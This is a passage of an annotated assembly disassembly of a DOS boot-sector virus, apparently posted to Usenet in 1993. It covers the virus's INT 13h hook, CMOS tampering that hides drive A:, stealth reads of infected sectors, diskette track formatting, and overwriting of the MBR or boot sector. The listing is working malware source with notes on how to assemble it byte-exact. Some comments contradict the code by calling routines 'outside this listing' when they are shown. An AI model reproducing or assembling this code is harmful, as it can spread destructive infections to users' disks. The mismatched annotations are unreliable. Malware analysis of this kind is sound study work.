  366.                                         ;               |3rd call: AL=00
  367.                                         ;               |4th call: AL=00
  368.                                         ;               |5th call: AL=5F
  369.                                         ;               |6th call: AL=02
  370.                                         ;               |
  371.         RET                             ;001E2  C3      |Back to Change_CMOS
       ;                                       ;               |after the 1st and 2nd
       ;                                       ;               |CALL; on the fall-
       ;                                       ;               |through 3rd pass this
       ;                                       ;               |returns to whoever
       ;                                       ;               |called Change_CMOS
       ;                                       ;               |(there is no
       ;                                       ;               |"Call_CMOS" label).
  372. ;---------------------------------------;---------------------------------
       ; Real_Int13_2 is a transparent wrapper around the previous INT 13h
       ; handler, with the CMOS flipped around the call:
       ;   1. Restore_CMOS: swap CMOS{10h,2Eh,2Fh} with the copy kept at
       ;      DS:[0054]/[0055].  AX and DX survive because Xchg_Old_New swaps
       ;      them out before Change_CMOS and back in afterwards.
       ;   2. PUSHF + far CALL through I13_Off/I13_Seg, the vector saved at
       ;      install time -- bypasses the virus's own hook and anything hooked
       ;      later.  AX (function/count), CX, DX, ES:BX reach the handler
       ;      exactly as the caller set them.
       ;   3. Falls through into Restore_CMOS again (swap back) and then into
       ;      Xchg_Old_New, whose RET returns to Real_Int13_2's caller.  Nothing
       ;      after the far call alters the flags (XCHG/MOV/IN/OUT/CALL/RET), so
       ;      the handler's CF and AH status arrive at the caller untouched.
       ; DS must address the resident copy for [0053h]/[0055h]/[I13_Off-100h]
       ; to hit the right cells; the callers of Setup_Int13/Real_Int13_2 are
       ; not in the visible part of the listing (presumably New_Int13_ISR).
       ;---------------------------------------;---------------------------------
  373.                                         ;               |
  374. Setup_Int13:                            ;               |
  375.                                         ;               |
  376.         MOV     AX,0301h                ;001E3  B80103  |Function #3: write
  377.                                         ;               |  (1) sector
       ;                                       ;               | then fall into
       ;                                       ;               | Real_Int13_2; other
       ;                                       ;               | callers enter there
       ;                                       ;               | with their own AX.
  378. Real_Int13_2:                           ;---------------------------------
  379.                                         ;               |
  380.         CALL    Restore_CMOS            ;001E6  E80500  |Swap CMOS <-> saved
       ;                                       ;               | copy (AX/DX kept)
  381.         PUSHF                           ;001E9  9C      |Prepare for interrupt
       ;                                       ;               | (far CALL + PUSHF
       ;                                       ;                  mimics an INT so
       ;                                       ;                  the handler's IRET
       ;                                       ;                  works)
  382.                                         ;---------------------------------
  383.                                                         ;DO THE INTERRUPT 13
  384.         CALL    DWord Ptr DS:[I13_Off-100h]             ;Subtract 100h from
  385.                                                         ; offset of old Int 13
  386.                                         ;001EA  FF1EB600| vector and then call
  387.                                         ;               | it as a DWord (i.e.
  388.                                         ;               | as Segment:Offset)
  389.                                         ;               | No retry/reset is
  390.                                         ;               | done here; whatever
  391.                                         ;               | status the handler
  392.                                         ;               | returns is passed on.
       ;                                       ;               | Returns here, then
       ;                                       ;               | FALLS THROUGH into
       ;                                       ;               | Restore_CMOS.
  393. Restore_CMOS:                           ;---------------------------------
       ;                                       ; Swap CMOS{10h,2Eh,2Fh} with the
       ;                                       ; saved copy; AX/DX preserved.
       ;                                       ; Also entered by fall-through
       ;                                       ; from the far call above.
  394.                                         ;               |
  395.         CALL    Xchg_Old_New            ;001EE  E80300  |AX<->[0053],DX<->[0055]
  396.         CALL    Change_CMOS             ;001F1  E8D6FF  |Write the saved values,
       ;                                       ;               |get the current ones
       ;                                       ;               |back in AH/DL/DH
  397.                                         ;               |
       ;                                       ;               |falls through:
  398. Xchg_Old_New:                           ;---------------------------------
  399.                                         ;               |
  400.         XCHG    AX,DS:[0053h]           ;001F4  87065300|AH <-> Drive (AL <->
       ;                                       ;               | the scratch byte)
  401.         XCHG    DX,DS:[0055h]           ;001F8  87165500|DX <-> ChkSum
  402.         RET                             ;001FC  C3      |Returns to the caller
       ;                                       ;               | of Xchg_Old_New, or
       ;                                       ;               | -- on the fall-
       ;                                       ;               | through path -- of
       ;                                       ;               | Restore_CMOS /
       ;                                       ;               | Real_Int13_2.
  403. ;---------------------------------------;---------------------------------
       ; Jump_From_Boot: Main_Routine (0204h, zeroes CMOS 10h/2Eh/2Fh and saves
       ; the previous values at [0054]/[0055]), then Restore_CMOS (swaps them
       ; back), then a far return.  Its caller and the tail of Main_Routine
       ; (Calc_ChkSum onward) are outside the visible listing, so the net CMOS
       ; state on return cannot be established from here.
       ;---------------------------------------;---------------------------------
  404.                                         ;               |
  405. Jump_From_Boot:                         ;               |
  406.                                         ;               |
  407.         CALL    Main_Routine            ;001FD  E80400  |
  408.                                         ; CALL 0204h    |
  409.                                         ;               |
  410.         CALL    Restore_CMOS            ;00200  E8EBFF  |Call 01EEh
       ;                                       ;               |(AX/DX preserved
       ;                                       ;               | across it)
  411.         ;-------------------------------;---------------------------------
  412.         ;RETF                           ;               |This must be assembled
  413.                                         ;               |as DB 0CBh, otherwise
  414.         DB      0CBh                    ;00203  CB      |the assembler emits
  415.                                         ;               |CA CB 00.
       ;                                       ;               |(CA = RETF imm16; the
       ;                                       ;               | author's report of
       ;                                       ;               | TASM doing this is
       ;                                       ;               | not explained here,
       ;                                       ;               | the DB simply keeps
       ;                                       ;               | the byte count and
       ;                                       ;               | the 0204h offset of
       ;                                       ;               | Main_Routine right.)
  416. ;---------------------------------------;---------------------------------
  417.                                         ;               |Diddle CMOS. Read
  418. Main_Routine:                           ;00204          |boot with new Int13.
       ;-------------------------------------------------------------------------
       ; Main_Routine -- reached by the CALL at 001FDh (return offset 0200h,
       ; which is the CALL Restore_CMOS).  Two jobs:
       ;  1. CMOS: clear the drive-0 (A:) type nibble of CMOS byte 10h and
       ;     lower the checksum word (bytes 2Eh/2Fh) by the same amount, so
       ;     the BIOS checksum test still passes.  What the BIOS does with
       ;     "no A: drive" is not shown in this listing; CMOS is put back by
       ;     Restore_CMOS once this routine returns.
       ;  2. Read cyl 0 / head 0 / sector 1 of drive 80h (first hard disk)
       ;     by building an INT-style return frame and falling straight into
       ;     New_Int13_ISR, so the hook's own stealth/infection logic runs.
       ; Entry assumptions (not visible here -- confirm against the caller):
       ;   CX = 0 (it is copied into ES); BX = sector buffer offset (the hook
       ;   later reads ES:[BX+28h]; the trace says 7C00h).
       ; Change_CMOS and Restore_CMOS are outside this listing.  Per the
       ; register trace, Change_CMOS appears to return the previous drive-type
       ; byte in AH and the previous checksum in DX.
       ; Offsets used at run time (DS:[0055h], SI=00A7h, ...) are listing
       ; addresses minus 100h -- cf. "Install - 100h" in Int13_Read.
       ; NOTE: live, destructive boot-sector malware (CMOS tampering, track
       ; formatting, MBR/boot-sector writes).  Handle only in an isolated
       ; emulator with no real disks attached.
       ;-------------------------------------------------------------------------
  419.                                         ;               |
  420. ;-------------------------------------------------------------------------
  421. ;                                                       |
  422. ; (64 Bytes)    FFEEDDCC BBAA9988 77665544 33221100     |This is the original
  423. ;               -------- -------- -------- --------     |CMOS setting.
  424. ; CMOS IS NOW:  00008050 02269303 28000016 00200027     |
  425. ;               00000000 0000310D 80028003 00F00020  <--|diskette drive(s) type
  426. ; Checksum -->  7F021A04 01000009 04000000 00000000     |Bits 7-4: drive 0
  427. ;  is 7F02      00000001 01000000 00000000 80190D80     |Bits 3-0: drive 1
  428. ;                                                       |  0000b = no drive
  429. ;                                                       |  0001b = 360K
  430. ;                                                       |  0010b = 1.2 MB
  431. ;                                                       |  0011b = 720K
  432. ;                                                       |  0100b = 1.44 MB
  433. ;                                                       |so in this case there
  434. ;                                                       |is one 1.2 meg drive
  435. ;                                                       |and no 'B' drive
       ;  (the dump prints byte 2Fh before 2Eh; as a word the |
       ;   code below handles this checksum as DX = 027Fh)    |
  436. ;-------------------------------------------------------------------------
  437.                                         ;               |DS = CS: address
  438. CMOS_0:                                 ;               | the resident virus
  439.         PUSH    CS                      ;00204  0E      | image (where it
  440.         POP     DS                      ;00205  1F      | lives isn't shown)
  441.         MOV     ES,CX                   ;00206  8EC1    |ES = CX (trace: 0;
                                               ;               | relies on the caller
                                               ;               | leaving CX = 0)
  442.         CALL    Change_CMOS             ;00208  E8BFFF  |AX=0099,DX=0000
  443. ;-------------------------------------------------------------------------
  444. ;
  445. ; CMOS CHANGED: 00008050 02269303 28000017 00420002
  446. ;               00000000 0000310D 80028003 00F00000 <-NOTE CHANGE
  447. ; NOTE CHANGE-> 00001A04 01000009 04000000 00000000    No drive
  448. ;  No checksum  00000001 01000000 00000000 80190D80
  449. ;
  450. ;-------------------------------------------------------------------------
  451.                                         ;               |Drive type and
  452. CMOS_1:                                 ;               | checksum are now 00
                                               ;               | in CMOS; AH=20h and
                                               ;               | DX=027Fh hold the
                                               ;               | old values (trace)
  453.         MOV     AL,AH                   ;0020B  8AC4    |AX=2020
  454.         AND     AL,0F0h                 ;0020D  24F0    |AL = drive-0 nibble
                                               ;               | (AX still 2020)
  455.         JZ      Calc_ChkSum             ;0020F  7408    |Nibble already 0:
                                               ;               | skip the save, so a
                                               ;               | previously saved
                                               ;               | original is presumably
                                               ;               | not clobbered
  456.         MOV     DS:[0055h],DX           ;00211  89165500|Store original checksum
  457.                                         ;               | in DS:[0055] (inside
                                               ;               | the virus image)
  458.         MOV     DS:[0054h],AH           ;00215  88265400|Store original drive
  459.                                         ;               | type in DS:[0054]
  460. Calc_ChkSum:                            ;---------------------------------
  461.                                         ;               |
  462.         AND     AH,0Fh                  ;00219  80E40F  |Drop drive-0 nibble,
  463.                                         ;               | keep B: (AX=0020)
  464.         SUB     DL,AL                   ;0021C  2AD0    |DX = 027F - 0020 =
  465.         SBB     DH,00h                  ;0021E  80DE00  | 025F: old checksum
                                               ;               | less the removed
                                               ;               | nibble value
  466.         CALL    Change_CMOS             ;00221  E8A6FF  |AX=0020, DX=025F
  467. ;-------------------------------------------------------------------------
  468. ;
  469. ; CMOS CHANGED: 00008050 02269303 28000018 00030041
  470. ;               00000000 0000310D 80028003 00F00000
  471. ; NOTE CHANGE-> 5F021A04 01000009 04000000 00000000
  472. ;               00000001 01000000 00000000 80190D80
  473. ;
  474. ;-------------------------------------------------------------------------
  475.                                         ;               |
  476. CMOS_2:                                 ;               |
  477.         MOV     DL,80h                  ;00224  B280    | DL = 80h: first
                                               ;               | hard disk
  478.                                         ;               |
  479. Read_Boot:                              ;---------------------------------
  480.                                         ;               |Entered two ways:
                                               ;               | (a) fall-through from
                                               ;               |  CMOS_2; stack top is
                                               ;               |  the return offset of
                                               ;               |  CALL Main_Routine
                                               ;               |  (0200h), DL = 80h;
                                               ;               | (b) CALL Read_Boot at
                                               ;               |  00281h; stack top is
                                               ;               |  0284h (Exit_Virus),
                                               ;               |  DL = drive that was
                                               ;               |  just written.
                                               ;               |The popped offset is
                                               ;               | rebuilt as a FLAGS/
                                               ;               | CS/IP frame so the
                                               ;               | hook's final RETF 2
                                               ;               | lands back on it.
  481.         MOV     CX,0001h                ;00226  B90100  | cyl 0, sector 1
  482.         MOV     DH,CH                   ;00229  8AF5    | head 0
  483.         POP     AX                      ;0022B  58      | Pop return offset
  484.         PUSHF                           ;0022C  9C      | Push flags
  485.         PUSH    CS                      ;0022D  0E      | Save segment
  486.         PUSH    AX                      ;0022E  50      | Save offset
  487.         MOV     AX,0201h                ;0022F  B80102  | AX = 0201 (read
  488.                                         ;               |  one sector to
                                               ;               |  ES:BX) and fall
                                               ;               |  into New_Int13_ISR
  489.                                         ;
  490. New_Int13_ISR:                          ;___ New Int 13 Service Routine ___
       ;-------------------------------------------------------------------------
       ; INT 13h hook.  Reached both as the installed interrupt handler (the
       ; installation itself is outside this listing) and by fall-through
       ; from Read_Boot with a hand-built FLAGS/CS/IP frame.
       ;  * Before the real handler: an AH=03h (write) whose buffer starts
       ;    with 4Dh ('M') and whose CL equals (03h OR DL) gets its buffer
       ;    overwritten with bytes of the resident image before the write is
       ;    passed on.  What that marker identifies cannot be told from this
       ;    listing.
       ;  * After the real handler returns with CF=0: any head-0, cylinder-0,
       ;    sector-1 access (boot sector / MBR) is post-processed -- reads go
       ;    to Int13_Read (stealth or infection), writes cause the sector to
       ;    be re-read through Read_Boot.
       ; Real_Int13_2 is outside this listing; the original note says it
       ; reaches the real handler and comes back to Return_Here.
       ; Exits with RETF 2, which drops the pushed FLAGS, so the CF state
       ; set here is what the caller sees.
       ;-------------------------------------------------------------------------
  491.                                         ;
  492.         CLD                             ;00232  FC      |Forward STOSW/MOVSB
  493.         PUSH    DS                      ;00233  1E      |
  494.         PUSH    SI                      ;00234  56      |
  495.         PUSH    DI                      ;00235  57      |Save some registers
  496.         PUSH    CX                      ;00236  51      |
  497.         PUSH    AX                      ;00237  50      |
  498.         PUSH    CS                      ;00238  0E      |
  499.         POP     DS                      ;00239  1F      |DS = CS
  500.         CMP     AH,03h                  ;0023A  80FC03  |Is it a function 3
  501.                                         ;               | (write disk) call?
  502.         JNZ     Real_Int13_1            ;0023D  7521    |No, so do real Int 13
  503.         CMP     Byte Ptr ES:[BX],4Dh    ;0023F  26803F4D|Yes, but is ES:[BX]=4D?
                                               ;               | ('M' -- first byte of
                                               ;               | the caller's buffer)
  504.         JNZ     Real_Int13_1            ;00243  751B    |No, so do real Int13
  505.         OR      AH,DL                   ;00245  0AE2    |AH = 03h OR drive
  506.         CMP     CL,AH                   ;00247  3ACC    |Does CL (sector, cyl
                                               ;               | high bits) equal it?
  507.         JNZ     Real_Int13_1            ;00249  7515    |No, so do real Int13
  508.         MOV     DI,BX                   ;0024B  8BFB    |Yes: DI = buffer
  509.         MOV     SI,00A7h                ;0024D  BEA700  |source = CS:00A7
                                               ;               | (A7h+1FEh = 2A5h,
                                               ;               | past the 200h-byte
                                               ;               | image as listed;
                                               ;               | what follows it in
                                               ;               | memory is not shown)
  510.         MOV     CX,01FEh                ;00250  B9FE01  |1FEh BYTES (MOVSB)
  511.         AND     DL,DL                   ;00253  22D2    |Is it drive #0 (A:)?
  512.         JNZ     H0000_025E              ;00255  7507    |No, so move 'em
  513.         MOV     SI,0002h                ;00257  BE0200  |Yes, source = CS:0002
  514.         MOV     AX,5CEBh                ;0025A  B8EB5C  |Write EB 5C (JMP
  515.         STOSW                           ;0025D  AB      | SHORT +5Ch) at
                                               ;               | ES:[BX]; DI = BX+2
  516.                                         ;               |
  517. H0000_025E:                             ;---------------------------------
  518.                                         ;               |DS=CS, CX=01FEh.
  519.                                         ;               |Copy 1FEh BYTES of
  520.         REP     MOVSB                   ;               | the resident image
  521.                                         ;0025E  F3A4    | over the caller's
                                               ;               | write buffer; the
                                               ;               | write then proceeds
  522. Real_Int13_1:                           ;---------------------------------
  523.                                         ;               |
  524.         POP     AX                      ;00260  58      |Restore registers
  525.         POP     CX                      ;00261  59      |
  526.         POP     DI                      ;00262  5F      |
  527.         MOV     SI,AX                   ;00263  8BF0    |SI=function,subfn
  528.         CALL    Real_Int13_2            ;00265  E87EFF  |When done go to
  529.                                         ;               | Return_here.
  530. Return_Here:                            ;---------------------------------
  531.                                         ;               |
  532.         JB      Int13_Error             ;00268  721D    |If Int 13 returned
  533.                                         ;               | error go to err rtn
  534.         PUSH    DI                      ;0026A  57      |Save registers
  535.         PUSH    AX                      ;0026B  50      |
  536.         OR      DH,DH                   ;0026C  0AF6    |DH is the HEAD number:
  537.         JNZ     Exit_Virus              ;0026E  7514    | not head 0, Exit_Virus
  538.         CMP     CX,+01h                 ;00270  83F901  |CX is cyl/sector (not
  539.                                         ;               | a count): 0001 = cyl
                                               ;               | 0, sector 1 = boot
                                               ;               | sector / MBR (assumes
                                               ;               | the real handler
                                               ;               | preserved CX)
  540.         JNZ     Exit_Virus              ;00273  750F    |Other sector: Exit_Virus
  541.         MOV     AX,SI                   ;00275  8BC6    |Restore Int 13
  542.                                         ;               | function, sub fn
  543.         CMP     AH,02h                  ;00277  80FC02  |Was it a read fn?
  544.         JZ      Int13_Read              ;0027A  7410    |
  545.         CMP     AH,03h                  ;0027C  80FC03  |Was it a write fn?
  546.         JNZ     Exit_Virus              ;0027F  7503    |Neither: Exit_Virus
  547.                                         ;               |
  548. Read_New_Boot:                          ;---------------------------------
  549.                                         ;               |A boot sector was just
  550.         CALL    Read_Boot               ;00281  E8A2FF  | written: re-read it
  551.                                         ;               | through this hook.
                                               ;               | The CALL pushes 0284h
                                               ;               | (Exit_Virus), which
                                               ;               | Read_Boot turns into
                                               ;               | a FLAGS/CS/IP frame,
                                               ;               | so the nested RETF 2
                                               ;               | returns to Exit_Virus
  552. Exit_Virus:                             ;---------------------------------
  553.                                         ;               |
  554.         CLC                             ;00284  F8      |Report success
  555.         POP     AX                      ;00285  58      |Restore registers
  556.         POP     DI                      ;00286  5F      |
  557.                                         ;               |
  558. Int13_Error:                            ;---------------------------------
  559.                                         ;               |CF still set when
                                               ;               | entered from the JB
  560.         POP     SI                      ;00287  5E      |
  561.         POP     DS                      ;00288  1F      |
  562.         RETF    0002h                   ;00289  CA0200  |Return to address
  563.                                         ;               | on stack. Discard
  564.                                         ;               | next two bytes on
  565.                                         ;               | stack (the pushed
  566.                                         ;               | FLAGS), so CF as set
  567.                                         ;               | here reaches the
  568.                                         ;               | caller. Original note:
                                               ;               | this eventually gets
                                               ;               | to offset 19C (check
                                               ;               | activation & reboot)
  569. ;---------------------------------------;---------------------------------
  570. Int13_Read:                             ;               |Boot sector was just
  571.                                         ;               | read into ES:BX
                                               ;               | (head 0, cyl 0, sec 1)
       ;-------------------------------------------------------------------------
       ; Two outcomes:
       ;  * sector[28h] == 7Ch -> treated as already infected (self-marker;
       ;    that byte of the virus image is outside this listing, so this is
       ;    inferred from the branch, not verified).  The original boot
       ;    sector is re-read from the cyl/sector word stored at sector
       ;    offset 57h (written there by Hard_Drive) over the same buffer, so
       ;    the caller never sees the infected sector -- a read-stealth path.
       ;  * otherwise -> Boot_Changed: infect it.
       ; The stealth read's CF is not checked: HD_Exit jumps to Exit_Virus,
       ; which CLCs, so a failed re-read still reports success.
       ;-------------------------------------------------------------------------
  572.         PUSH    CX                      ;0028C  51      |Save cyl/sector (0001)
  573.         CMP     Byte Ptr ES:[BX+28h],7Ch;0028D  26807F  |Compare ES:[BX+28h]
  574.                                         ;       287C    | (0000:7C28 in the
  575.                                         ;               | trace) with 7C.
  576.         JNZ     Boot_Changed            ;00292  750D    |No marker: sector is
  577.                                         ;               | not infected -> infect
  578.                                         ;00294  268B8F  |MOV CX,ES:[BX+0057h]
  579.                                         ;       5700    |
  580.                                                         ;
  581.         MOV     CX,ES:[BX + word ptr Install - 100h]    ;CX = cyl/sector where
  582.                                                         ; the original sector
                                                               ; was parked (sector
                                                               ; offset 57h; Install
                                                               ; label is outside
                                                               ; this listing)
  583.         MOV     AL,01h                  ;00299  B001    |one sector; AH still 02
  584.         CALL    Real_Int13_2            ;0029B  E848FF  |Read the original over
                                               ;               | ES:BX (DL unchanged,
                                               ;               | DH = 0); CF ignored
  585.                                         ;               |
  586. HD_Exit:                                ;---------------------------------
  587.                                         ;               |
  588.         POP     CX                      ;0029E  59      |CX = 0001 again
  589.         JMP     Short Exit_Virus        ;0029F  EBE3    |CLC and return
  590. ;---------------------------------------;---------------------------------
  591. Boot_Changed:                           ;               |Sector in ES:BX is
  592.                                         ;               | not yet infected
       ;-------------------------------------------------------------------------
       ; Chooses where the original boot sector will be parked (CX) and, for a
       ; diskette, formats an extra track to hold it:
       ;   hard disk : CX = 0011h  -> cylinder 0, sector 17 (head 0)
       ;   diskette  : CX = 2811h or 5011h -> track 40 or 80, sector 17,
       ;               chosen by the byte at sector offset 15h (presumably the
       ;               BPB media descriptor of a DOS boot sector; values below
       ;               0FCh select track 80).
       ; Only head 0 is ever used (DH was checked at Return_Here).  The
       ; format call's CF is not checked; any failure surfaces only if the
       ; later Setup_Int13 write fails.
       ;-------------------------------------------------------------------------
  593.         PUSH    DX                      ;002A1  52      |Save drive info
  594.         MOV     CL,11h                  ;002A2  B111    |sector 17 (CH is 00
                                               ;               | from the CX=0001 test)
  595.         TEST    DL,80h                  ;002A4  F6C280  |Is it a hard drive?
  596.         JNZ     Hard_Drive              ;002A7  7534    |Yes, goto Hard_Drive
  597.         MOV     CH,28h                  ;002A9  B528    |track 40 ...
  598.         CMP    Byte Ptr ES:[BX+15h],0FCh;002AB  26807F  |media byte >= FCh?
  599.                                         ;       15FC    | (FCh..FFh presumably
                                               ;               | the 40-track media)
  600.         JNB     H0000_02B4              ;002B0  7302    |yes: keep track 40
  601.         SAL     CH,1                    ;002B2  D0E5    |no: track 80 (50h)
  602.                                         ;               |
  603. H0000_02B4:                             ;---------------------------------
  604.                                         ;               | Format one extra
  605.         PUSH    ES                      ;002B4  06      | diskette track via
  606.         PUSH    BX                      ;002B5  53      | INT 13h AH=05h
  607.         XOR     AX,AX                   ;002B6  33C0    |
  608.         MOV     ES,AX                   ;002B8  8EC0    |ES = 0
  609.         LES     BX,DWord Ptr ES:[0078h] ;002BA  26C41E  |ES:BX = vector 1Eh
  610.                                         ;       7800    | (1Eh*4 = 78h), i.e.
  611.                                         ;               | the diskette
  612.                                         ;               | parameter table
  613.         PUSH    ES                      ;002BF  06      |Keep the DPT pointer
  614.         PUSH    BX                      ;002C0  53      |
  615.         INC     AL                      ;002C1  FEC0    |AL = 1
  616.         MOV     CL,AL                   ;002C3  8AC8    |CL = 1
  617.         XCHG    CL,ES:[BX+04h]          ;002C5  26864F04|DPT byte 4 (sectors
                                               ;               | per track in the
                                               ;               | standard table) := 1;
                                               ;               | old value kept in CL
  618.         MOV     AH,05h                  ;002C9  B405    |AH=05: format track
  619.         MOV     BX,0059h                ;002CB  BB5900  |format table at
  620.         MOV     [BX],CH                 ;002CE  882F    | CS:0059; first byte
                                               ;               | := track number
                                               ;               | (writes into the
                                               ;               | resident image)
  621.         PUSH    CS                      ;002D0  0E      |
  622.         POP     ES                      ;002D1  07      |ES:BX -> that table
  623.         CALL    Real_Int13_2            ;002D2  E811FF  |Format track CH,
                                               ;               | head 0, drive DL;
                                               ;               | CF not checked
  624.         POP     BX                      ;002D5  5B      |
  625.         POP     ES                      ;002D6  07      |ES:BX = DPT again
  626.         XCHG    CL,ES:[BX+04h]          ;002D7  26864F04|Restore DPT byte 4
  627.         POP     BX                      ;002DB  5B      |
  628.         POP     ES                      ;002DC  07      |ES:BX = boot buffer
  629.                                         ;               |
  630. Hard_Drive:                             ;---------------------------------
       ;-------------------------------------------------------------------------
       ; Infect the boot sector held in ES:BX (both drive types arrive here;
       ; CX = parking cyl/sector chosen by Boot_Changed):
       ;  1. Setup_Int13 (outside this listing; original note "Prepare for
       ;     Write") -- presumably writes the still-clean sector to CX.  On
       ;     CF=1 bail out via HD_Exit.
       ;  2. Record CX at DS:[0057h] inside the resident image; Int13_Read
       ;     later reads that word back from sector offset 57h.
       ;  3. Patch bytes 0-1 to EB 1C (JMP SHORT to offset 1Eh) and copy
       ;     1E0h bytes of the image from CS:001E over sector offsets
       ;     1Eh..1FDh.  Bytes 02h..1Dh (BPB) and 1FEh..1FFh (55AA) are kept,
       ;     so the result still looks like a valid DOS boot sector.
       ;  4. Write it back to cyl 0 / sector 1 and re-read it (Read_New_Boot).
       ; Forensic note: run-time offsets 54h/55h (saved CMOS values), 57h
       ; (parking location) and 59h (format table) all lie inside the copied
       ; range, so an infected sector carries those values from the machine
       ; that infected it.
       ;-------------------------------------------------------------------------
  631.                                         ;               |
  632.         CALL    Setup_Int13             ;002DD  E803FF  |Prepare for Write
  633.         POP     DX                      ;002E0  5A      |Get drive info (POP
                                               ;               | leaves CF intact)
  634.         JB      HD_Exit                 ;002E1  72BB    |On error exit
  635.         MOV     DS:[0057h],CX           ;002E3  890E5700|DS:[57] = parking
                                               ;               | cyl/sector
  636.         MOV     Word Ptr ES:[BX],1CEBh  ;002E7  26C707  |[0000:7C00] now holds
  637.                                         ;       EB1C    | EB 1C (JMP to 1Eh)
  638.         MOV     SI,001Eh                ;002EC  BE1E00  |SI=001E (image)
  639.         ;-------------------------------;---------------------------------
  640.         ;LEA     DI,[BX+001Eh]          ;               |TASM will emit 8D7F1E
  641.                                         ;               |for this instruction,
  642.         DB      8Dh,0BFh,1Eh,00h        ;002EF  8DBF1E00|so assemble as DB's
  643.                                         ;               |BX=7C00 SI=001E
  644.                                         ;               |ES=0000 DI=7C1E
  645.         ;-------------------------------;---------------------------------
  646.         MOV     CX,01E0h                ;002F3  B9E001  |cx=01E0h si=001Eh
  647.         REP     MOVSB                   ;002F6  F3A4    |Move DS:SI to ES:DI
  648.                                         ;               |Overwrite sector
  649.                                         ;               | offsets 1Eh..1FDh
  650.                                         ;               | with the image; the
  651.                                         ;               | EB 1C jumps there.
  652.         POP     CX                      ;002F8  59      |CX=0001 saved at
                                               ;               | Int13_Read: cyl 0,
                                               ;               | sector 1
  653.         CALL    Setup_Int13             ;002F9  E8E7FE  |Write the infected
  654.                                         ;               | sector back.
  655.         JMP     Short Read_New_Boot     ;002FC  EB83    |Read it and process.
  656. ;---------------------------------------;---------------------------------
  657. Boot_ID DW      0AA55h                  ;002FE  55AA    |All valid boot
  658.                                         ;               | sectors end with
  659.                                         ;               | 55AA; image ends at
                                               ;               | 300h (512 bytes from
                                               ;               | ORG 100h)
  660.         ENDS                            ;---------------------------------
  661.                                         ; Disassembly by Arthur Ellis and ??
  662.         END     Boot_Start              ; [Suggestions by Lucifer Messiah]
  663.                                         ; April, 1993
  664. ;-------------------------------------------------------------------------
  665.  
  666.  
  667.  
  668. --
  669. Eric "Mad Dog" Kilby                                 maddog@ccs.neu.edu
  670. The Great Sporkeus Maximus                 ekilby@lynx.dac.neu.edu
  671. Student at the Northeatstern University College of Computer Science 
  672. "I Can't Believe It's Not Butter"
  673.  
  674.